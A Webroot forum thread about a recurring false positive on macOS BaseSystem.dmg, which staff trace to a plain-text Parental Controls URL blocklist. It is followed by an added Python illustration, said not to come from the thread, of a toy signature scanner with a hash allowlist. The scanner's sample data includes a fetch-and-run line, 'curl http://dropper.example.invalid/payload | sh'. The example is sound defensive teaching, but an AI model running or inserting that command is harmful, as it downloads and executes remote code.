False positive is back again: BaseSystem.dmg

  • 27 June 2019
  • 8 replies

Badge +3
Once again, BaseSystem.dmg, which is part of the recovery partition installer for MacOS 10.11.6, is yet again being reported as a threat.

Our MSP only offers Webroot as an AV solution, and although I wish it weren't the case, it really appears that Mac support in Webroot is: "Well... if we HAVE to" level of support.

I've been through the Adobe Creative Cloud crippling false positives of a year ago where if you didn't hit the right button, your CC install would be trashed. I've been through the total lack of interest in fixing the "Secure keyboard entry" conflicts with Adobe apps. I've been through the horrendously slow drive scans compared to other products. The high CPU usage... the firing off of multiple simultaneous scans... the CPU fans going nuts... The persistent exclamation mark in the menu bar because it is going to find something wrong that isn't. It's so bad I've given up asking users to report it to me.

I am normally a very civil and calm person, but this is really getting under my skin. Will Webroot ever give a crap about the Mac product?

8 replies

Userlevel 7
@Annoyed User Welcome to the Webroot Community Forum. ☺️

> I am normally a very civil and calm person, but this is really getting under my skin. Will Webroot ever give a crap about the Mac product?

The answer to your question, I believe, is that what you see is what you get with WSA on a Mac computer, sorry to say. I'm waiting for the new surprises with WSA when Apple releases macOS Catalina 10.15.

Please see THIS POST that I posted a few days ago.

Userlevel 7
Badge +26
This has been reported to our threat team and we will get back shortly.

Userlevel 7
Badge +22
@Annoyed User

This is an older FP that occasionally pops up here and there in a couple of circumstances. It's possible that an older definitions file is still being used by the agent on this system, or it had an older definitions file upon its first start-up after a long period of not being started up. If a scan is performed in this state, older false positives can be detected and reported to the console.

Another possibility is that this infection was detected with the original false positive date and has continued to report to the console that the machine is infected, even after a definitions file has been updated. This could be a bug that we would want to investigate through support channels.

If this is the case, the agent on the physical machine would actually show a green "Protected" status, while only the console shows the infection history.

I don't have many details from your post. Could you try to confirm whether the agent reports a green status? Also, could you reply and let me know whether this false positive alert was noticed from within your console?

We do not have any other volume on support regarding this false positive detection. Feel free to PM me your email details and I would be glad to look at your account information.


Badge +3
It just completed a full scan (10 hours for one SSD drive!) and it is still showing as detected as PUA.OSX.Adware.BucaApps.1.r. The console is not showing green; it still shows "Threats Detected".

VirusTotal shows the 470MB disk image to be clean.

I'll PM you with info.

Userlevel 7
Badge +22
Late follow up on this post.

There was a file contained within this DMG that is a list of plain-text malicious URLs that OS X used in a previous version (10.11) of Parental Controls. This file is not included in current releases that I have found, so I believe that they have changed the method in which they store these URLs or provide an entirely different mechanism.

Annoyed User opted to allow the file manually so that we could continue to protect against any malicious file that embeds the URL in question within a payload file.
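
The mechanism described in the reply above (a signature on a known-malicious URL string firing on a plain-text blocklist that merely lists that URL) is the classic content-signature false positive. As an added illustration that is not Webroot's code and not anything posted in this thread, the Python below builds a toy scanner that reproduces the FP, adds a cheap context check that downgrades a hit inside URL-list reference data, and shows the per-file hash allowlist that corresponds to the manual "allow" mentioned above. Every indicator URL, file body and hash here is constructed sample data.

```python
"""Toy content-signature scanner reproducing the URL-list false positive.

Illustrative code added to this thread; it is not Webroot's engine. All
indicators and sample files are constructed.
"""
import hashlib
import re

# Constructed indicator set, standing in for a definitions file. The thread
# notes that a stale definitions file can resurrect an already-fixed FP, so
# in practice this list changes with every update.
MALICIOUS_URL_INDICATORS = (
    b"http://dropper.example.invalid/payload",
    b"http://adware.example.invalid/offer",
)

# A line that is nothing but a URL.
URL_LINE = re.compile(r"https?://\S+")


def sha256_hex(data: bytes) -> str:
    """Content hash used as the allowlist key for a manually allowed file."""
    return hashlib.sha256(data).hexdigest()


def indicator_hits(data: bytes) -> list:
    """Naive content signature: any indicator present as a raw byte substring."""
    return [i.decode() for i in MALICIOUS_URL_INDICATORS if i in data]


def looks_like_url_list(data: bytes, threshold: float = 0.9) -> bool:
    """True when the file is plain text whose non-empty lines are almost all
    bare URLs, i.e. blocklist-style reference data rather than a payload."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False  # binary content is never treated as a URL list
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if not lines:
        return False
    url_lines = sum(1 for ln in lines if URL_LINE.fullmatch(ln))
    return url_lines / len(lines) >= threshold


def naive_verdict(data: bytes) -> str:
    """What the signature alone says: the source of the false positive."""
    return "detected" if indicator_hits(data) else "clean"


def classify(data: bytes, allowlist: set) -> str:
    """Verdict with the allowlist and the context check applied.

    Returns one of: allowed, clean, probable-fp, detected.
    """
    if sha256_hex(data) in allowlist:
        return "allowed"
    hits = indicator_hits(data)
    if not hits:
        return "clean"
    if looks_like_url_list(data):
        return "probable-fp"  # indicator appears only as reference data
    return "detected"


# Constructed sample files.
# A plain-text URL blocklist, like the Parental Controls list in the thread.
PARENTAL_CONTROLS_LIST = b"\n".join([
    b"http://dropper.example.invalid/payload",
    b"http://adware.example.invalid/offer",
    b"http://gambling.example.invalid/",
]) + b"\n"

# A binary blob that embeds the same URL as part of its behaviour.
DROPPER_PAYLOAD = (
    b"MZ\x90\x00\xff\xfe" + b"\x00" * 16
    + b"curl http://dropper.example.invalid/payload | sh" + b"\x00" * 8
)

CLEAN_DOC = b"Release notes: nothing to see here.\n"


def demo() -> dict:
    """Run the three samples through both scanners, then allow the list."""
    allowlist = set()
    results = {
        "list_naive": naive_verdict(PARENTAL_CONTROLS_LIST),
        "list": classify(PARENTAL_CONTROLS_LIST, allowlist),
        "payload": classify(DROPPER_PAYLOAD, allowlist),
        "clean": classify(CLEAN_DOC, allowlist),
    }
    # The manual allow from the thread: key the exception on the file hash so
    # the signature keeps firing on any *other* file carrying the URL.
    allowlist.add(sha256_hex(PARENTAL_CONTROLS_LIST))
    results["list_after_allow"] = classify(PARENTAL_CONTROLS_LIST, allowlist)
    results["payload_after_allow"] = classify(DROPPER_PAYLOAD, allowlist)
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:20s} {verdict}")
```

Keying the exception on the file's hash rather than on the URL string is the point: the blocklist stops alerting, but a payload that embeds the same URL is still caught, which is the trade-off the reply above describes.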

Badge +1
I have had this threat on my control panel for some time, and whilst I was aware it wasn't anything serious, it is becoming quite annoying, and I would like to remove it.

I am still running MacOS Sierra.

Basesystem.dmg - PUA.OSX.Adware.BucaApps.1.r

Any idea how I actually go about this without wrecking anything?

Userlevel 7
Hello @shaneb, Welcome to the Webroot Community Forum.

I would have the Professionals at Webroot Support do this. Please submit a Support Ticket or Contact Webroot Support to sort this problem. This service is FREE with a Paid Subscription.
Support Ticket System is Open 24/7

Note: When submitting a Support Ticket, please wait for a response from Support. Putting in another Support Ticket on this problem before Support responds will put your first Support Ticket at the end of the queue.

Badge +1
Thanks Dave, I will do that! 🙂